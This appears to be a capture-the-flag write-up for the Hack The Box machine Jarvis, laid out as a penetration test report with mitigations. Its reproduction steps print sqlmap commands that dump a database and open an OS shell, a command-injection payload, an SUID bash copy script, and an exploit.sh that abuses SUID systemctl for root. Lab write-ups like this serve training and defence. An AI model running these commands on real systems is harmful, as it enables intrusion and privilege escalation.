Jarvis CTF Writeup
Table of Contents
ToggleJarvis CTF
Jarvis is a medium-level Linux challenge featuring a web server with SQL injection vulnerability. Exploiting this leads to initial access. Privilege escalation involves executing a script as another user and exploiting an SUID bit set on systemctl to gain root access.
HackTheBox
Hack The Box gives individuals, businesses and universities the tools they need to continuously improve their cybersecurity capabilities — all in one place.
Executive Summary
This report documents the findings of a penetration test conducted against the Jarvis CTF's web server, identified by the virtual host supersecurehotel.htb
and IP address 10.10.10.143
. The test revealed multiple vulnerabilities, ranging from SQL Injection to Vertical Privilege Escalation, which pose significant security risks to the system. Immediate actions are recommended to mitigate these vulnerabilities and enhance the security posture of the system.
Introduction
The penetration test aimed to identify and exploit vulnerabilities within the system to assess its security. The primary focus was on the web server running at 10.10.10.143
, which hosts the supersecurehotel.htb
site. This report provides an overview of the methodologies used, a detailed description of the vulnerabilities discovered, and recommended mitigations.
Methodology
The penetration test followed a structured approach, beginning with service enumeration to identify open ports and services. The identified services were then subjected to various attack techniques to uncover vulnerabilities. The process involved automated tools as well as manual testing to ensure comprehensive coverage.
Findings and Recommendations
Overview of Vulnerabilities
The test uncovered four critical vulnerabilities, detailed below. Each finding is accompanied by a severity rating to indicate the potential impact on the system.
BS01: SQL Injection
- Severity: Elevated
- Impact: Allows unauthorized access to potentially sensitive information from the database.
- Recommendation: Implement input validation and prepared statements to mitigate this vulnerability. It's crucial to apply a whitelist approach for input validation and to ensure that queries are safely executed.
BS02: Remote Code Execution
- Severity: High
- Impact: Permits remote attackers to execute arbitrary code on the system.
- Recommendation: Addressing the SQL Injection vulnerability (BS01) will also mitigate this issue. Additionally, ensure that the web application runs with the least privileges required, reducing the potential impact of such vulnerabilities.
BS03: Horizontal Privilege Escalation
- Severity: High
- Impact: Allows attackers to escalate privileges horizontally, gaining access as other users.
- Recommendation: Review and restrict the use of sudo privileges for scripts and ensure that scripts executed with elevated privileges do not contain vulnerabilities that could be exploited for command injection.
BS04: Vertical Privilege Escalation
- Severity: Extreme
- Impact: Enables attackers to escalate privileges from a lower-privileged user to root.
- Recommendation: Remove unnecessary SUID bits from binaries that do not require them, especially those that can execute shell commands. Regularly audit permissions and SUID bits to ensure they are only assigned where absolutely necessary.
Additional Insights
Emerging Threats and Trends
The cybersecurity landscape is continuously evolving, with new threats emerging regularly. The vulnerabilities identified in this report—SQL Injection, Remote Code Execution, Horizontal, and Vertical Privilege Escalation—are not new but remain highly effective in the attacker's arsenal due to common oversights in security practices. Recent trends show an increase in sophisticated, targeted attacks exploiting such vulnerabilities, often as entry points for more extensive breach campaigns. Organizations should stay informed about the latest threat intelligence and adapt their security strategies accordingly.
Security Best Practices
To enhance the security posture and mitigate the risk of exploitation, organizations should adopt a layered security approach. This includes not only technical measures but also administrative and physical security controls. Some key best practices include, but are not limited to: least privilege principle, regular security audits and assessments, security awareness training, incident response planning and so on.
Initial Target - 10.10.10.143
Virtual Host: supersecurehotel.htb
Service Enumeration
Objective: Identify open ports and services to determine potential attack vectors.
Findings:
IP Address | Ports Open |
---|---|
10.10.10.143 | TCP: 22 (SSH), 80 (HTTP), 64999 (Custom Service) |
Analysis: The presence of SSH and HTTP indicates standard remote management and web server functionalities, respectively. The custom service running on port 64999 could represent a less conventional entry point, warranting further investigation. Initial scans suggest a potential focus on the web server for vulnerability exploitation due to its accessibility and the broad attack surface such services often present.
Target: Web Server (port 80/tcp)
BS01: SQL Injection
- Vulnerability Explanation: A critical SQL injection flaw was discovered on
supersecurehotel.htb/room.php
, affecting thecod
parameter. This flaw allows unauthorized database access, enabling attackers to retrieve or manipulate sensitive data. SQL Injection vulnerabilities arise from improper input validation and allow attackers to inject malicious SQL code into queries. - Severity: Elevated
Recommendation: Implement stringent input validation measures, adopting a whitelist approach to only allow predefined inputs. Employing parameterized queries or prepared statements is crucial to ensure that user input is handled securely, effectively mitigating this vulnerability. - Steps to Reproduce:
- Utilize
sqlmap
, a tool designed for automating the detection and exploitation of SQL injection flaws. - Execute the command:
sqlmap -u http://supersecurehotel.htb/room.php?cod=2 -p cod -D hotel -T room --delay=3 --dump
- Technical Insight: Although the
hotel
database currently lacks sensitive information, the vulnerability's existence poses a significant future risk. Its simplicity and the lack of requirement for advanced technical knowledge for exploitation elevate its severity.
BS02: Remote Code Execution (RCE)
- Vulnerability Explanation: Exploitation of the previously mentioned SQL injection vulnerability opens the door to executing arbitrary code on the server as the
www-data
user. This level of access can enable an attacker to gain control over the web server, presenting a severe security risk. - Severity: High
Recommendation: Rectifying the SQL injection vulnerability will inherently close the gap allowing for RCE. It is also advised to limit the web server's execution privileges and regularly audit for unnecessary services or applications that could increase the attack surface. - Steps to Reproduce:
- Following the injection point discovery, we'll use
sqlmap
to gain a shell on the server. - Execute the following command:
sqlmap -u http://supersecurehotel.htb/room.php?cod=2 -p cod --delay=2 --dbms=mysql --os-shell --web-root=/var/www/html --random-agent --skip-waf --batch --technique=B
Post-Exploitation
BS03: Horizontal Privilege Escalation
- Vulnerability Explanation: The
www-data
user can exploitsudo
permissions to execute a python script (`simpler.py`) as the userpepper
, allowing command injection and lateral movement across the system. - Severity: High
Recommendation: Audit and restrict sudo permissions, especially for scripts and binaries. Ensure that all scripts executed with elevated privileges are thoroughly vetted for vulnerabilities such as command injection. - Steps to Reproduce:
- Create and execute a malicious script (located at
/var/www/html/evil.sh
) to leverage thewww-data
user's permissions:
#!/bin/bash
cp /bin/bash /var/www/html/
chmod +s /var/www/html/bash
- Run
sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
- Utilize command injection via the vulnerable script to execute commands as the
pepper
user, by typing$(bash /var/www/html/evil.sh)
and pressing enter. - Execute
/var/www/html/bash -p
to gain a shell as pepper.
BS04: Vertical Privilege Escalation
- Vulnerability Explanation: The presence of a SUID bit on the
/bin/systemctl
binary allows a user with sufficient permissions, such aspepper
, to escalate privileges to root. - Severity: Extreme
Recommendation: Conduct a thorough audit of all binaries with the SUID bit set and ensure they are necessary for their intended purpose. Remove the SUID bit from binaries that do not require it to prevent unauthorized privilege escalation. - Steps to Reproduce:
- The script below illustrates how an attacker can exploit the SUID bit on
systemctl
to gain root access, emphasizing the critical nature of maintaining strict permissions on sensitive binaries.
File: exploit.sh
#!/bin/bash
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
/bin/bash -p
Conclusion
We hope you have found our content useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon!
BEHIND SECURITY
Behind Security is an online platform dedicated to providing informative articles on cybersecurity, privacy, and programming.